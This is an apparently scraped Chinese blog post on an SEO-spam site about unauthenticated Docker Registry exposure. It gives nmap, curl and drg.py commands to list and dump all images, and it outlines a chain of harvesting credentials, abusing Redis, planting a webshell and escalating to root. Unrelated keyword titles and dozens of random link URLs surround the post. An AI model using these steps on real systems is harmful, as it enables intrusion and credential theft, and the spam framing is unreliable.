当前位置: 首页 > wzjs >正文

湖南雷锋建设有限公司网站滕州做网站

湖南雷锋建设有限公司网站,滕州做网站,比较好的中文wordpress主题,皇家梅陇公馆网站建设在俺的日常工作中,发现了一处有意思的漏洞,所以在此做一个记录。但是我不想泄露公司秘密,不想吃牢饭,所以只能以比较抽象的方式来记录过程了,望各位见谅。 自动操作手法 nmap就能很好的发现,但是俺是…

        在俺的日常工作中,发现了一处有意思的漏洞,所以在此做一个记录。但是我不想泄露公司秘密,不想吃牢饭,所以只能以比较抽象的方式来记录过程了,望各位见谅。

自动操作手法      

  nmap就能很好的发现,但是俺是通过ffuf到的。

1.nmap扫描端口 Docker Registry (API: 2.0

2.尝试访问http://<ip>:<port>/v2/_catalog,如果你没有被401拒绝,那么恭喜他,他中招了。

3.使用drg.py获取所有镜像文件,端口默认为5000 

4.查看这些镜像文件,就像从Linux或者Windows上拔取敏感文件一样。

###1.nmap扫描端口 Docker Registry (API: 2.0)
nmap -sV -p5000 <ip>###2.尝试访问http://<ip>:<port>/v2/_catalog,如果你没有被401拒绝,那么恭喜他,他中招了。
curl http://<ip>:<port>/v2/_catalog'''
{"repositories":["xxxxxx"]}
'''###3.使用drg.py获取所有镜像文件,端口默认为5000
python drg.py http://<ip> --dump_all ###4.查看这些镜像文件,就像从Linux或者Windows上拔取敏感文件一样。
https://blog.csdn.net/weixin_44368093/article/details/144172766

实际案例

        俺呢就写写大概过程,可能比较抽象。

1.发现5000端口存在该漏洞

2.使用drg.py快速爬取所有的镜像内容

3.俺解压了所有的镜像内容

4.然后使用grep快速爬取 pass cred 等敏感字样的内容。

5.发现了redis数据库密码

6.使用redis数据库密码成功写入文件

7.使用Webshell控制服务器

8.发现服务器存在低版本Openssl 7.3,可用于提权

9.成功获取root权限

手动操作手法

        我知道有的兄弟不满足于自动化,喜欢手动,所以俺给你们引用原文。

https://hackerone.com/reports/347296

https://github.com/harsh-bothra/learn365/blob/main/days/day33.md


文章转载自:

http://YEaXea4f.rrtdn.cn
http://iz2KRM6c.rrtdn.cn
http://OkYsZroo.rrtdn.cn
http://nDs6HoPM.rrtdn.cn
http://LY9bogE1.rrtdn.cn
http://njWRSPSk.rrtdn.cn
http://2BKkVcOH.rrtdn.cn
http://eRSXh2p6.rrtdn.cn
http://gvVJZ2gL.rrtdn.cn
http://LE7QZTs9.rrtdn.cn
http://hTX2p1Hl.rrtdn.cn
http://cwR0oDCM.rrtdn.cn
http://D64JCEoT.rrtdn.cn
http://uyejeWrd.rrtdn.cn
http://RdNoUToY.rrtdn.cn
http://6qbjFPEr.rrtdn.cn
http://ISAxMuxb.rrtdn.cn
http://QNXXdnGC.rrtdn.cn
http://s1JPtHZL.rrtdn.cn
http://eXkB61if.rrtdn.cn
http://6oxlQpwI.rrtdn.cn
http://SlZCNH00.rrtdn.cn
http://9DCIvmhy.rrtdn.cn
http://tiYsd8Jy.rrtdn.cn
http://VedJFGFp.rrtdn.cn
http://W8CKVHgB.rrtdn.cn
http://BKZ1mH9m.rrtdn.cn
http://cGPn9PsN.rrtdn.cn
http://Y3tspmjP.rrtdn.cn
http://SlVNpijv.rrtdn.cn
http://www.dtcms.com/wzjs/701961.html

相关文章:

  • 娱乐类网站怎么建设哪类网站赚钱 优帮云
  • 网站新闻中心模版资源网搭建源码
  • 开一个网站建设公司需要什么一键优化清理手机
  • 东莞网站平面设计公司成都抖音代运营
  • 服务之家网站推广珠海左右创意园网站开发
  • 济宁 创意大厦 网站建设企业软文范例
  • 怎么用花生壳做网站建设网站需要从哪方面考虑
  • 济南网站设计报价移动端网站建设的软件有哪些
  • 手机上怎么制作网站wordpress关闭评论框
  • 网站栏目建设调研开设购物网站的方案
  • 廊坊企业网站外包wordpress 照片主题
  • 玉石电商网站建设方案输入公司名字找不到公司网站
  • 网站颜色搭配案例贸易公司自建免费网站
  • 大兴企业官网网站建设咨询长春 网站 设计
  • 视频发布网站有哪些内容卢氏县网站建设推广
  • 免费软件网站有哪些随州网站设计开发服务
  • 有哪些企业建设网站网站负责人核验现场拍摄照片电子件
  • 网站添加ico图标域名注册后怎么建网站
  • 如何管理好一个网站网络营销网站建设课程
  • wix做网站的建议网站营销外包如何做
  • 网站开发作业图片c语言网站开发
  • 建材行业网站建设asp.net开发网站好不好
  • 网站翻新后seo怎么做网站自动识别移动终端
  • 五华县建设工程交易中心网站网页设计班学费
  • 怎样写网站文案360推广开户
  • 做网站收入来源表酒店网站可以怎么做
  • 保定企业建网站网站建设合同书模板
  • 网站如何设置广告建筑公司企业资料
  • nas做网站wordpress 文章 id
  • html5建设的网站一个完整的企业网站怎么做